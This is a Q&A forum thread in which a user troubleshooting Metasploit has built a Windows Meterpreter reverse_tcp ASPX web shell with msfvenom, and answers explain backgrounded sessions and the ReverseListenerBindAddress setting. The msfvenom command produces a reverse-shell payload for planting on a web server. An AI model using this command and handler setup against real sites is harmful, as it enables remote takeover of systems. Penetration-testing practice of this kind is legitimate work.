I have created a payload to a website with msfvenom, and started the exploit/multi/handler exploit, they then connect to each other and create a meterpreter session as seen below, but I do not get the meterpreter prompt which I believe I should get and typing any commands just moves me back into the msf exploit(handler) prompt. has anyone ever experienced this before. my OS is parrot and the payload is made with the following command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx

enter image description here

any help is appreciated and I am ready to provide any other information that might be needed.

2 Answers 2


The Meterpreter session has gone to the background, which is default behaviour for Metasploit now.

To view the background sessions:

sessions -l

To interact with the session:

sessions -i <session id>
  • I ran into the same issue, but unfortunately I cannot interact with metasploit in any way, in this state. Except ctrl-cing out of it. What am I missing? -.-
    – d4Rk
    Sep 7, 2019 at 19:38
  • Ah, I see, I can/have to actually ctrl-c out first... really confusing.
    – d4Rk
    Sep 7, 2019 at 20:12
  • The only way I can run this is by ctrl-c-ing out, but then it doesn't show a session. May 28, 2021 at 21:53

Using Ctrl + C and then session -i wont help, since the connection has been dropped already and executing meterpreter commands will return unknown.

Just set ReverseListenerBindAddress along with LHOST, this solved the issue for me.

PS: ReverseListenerBindAddress gotta be same value as LHOST in reverse_tcp.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy

Not the answer you're looking for? Browse other questions tagged or ask your own question.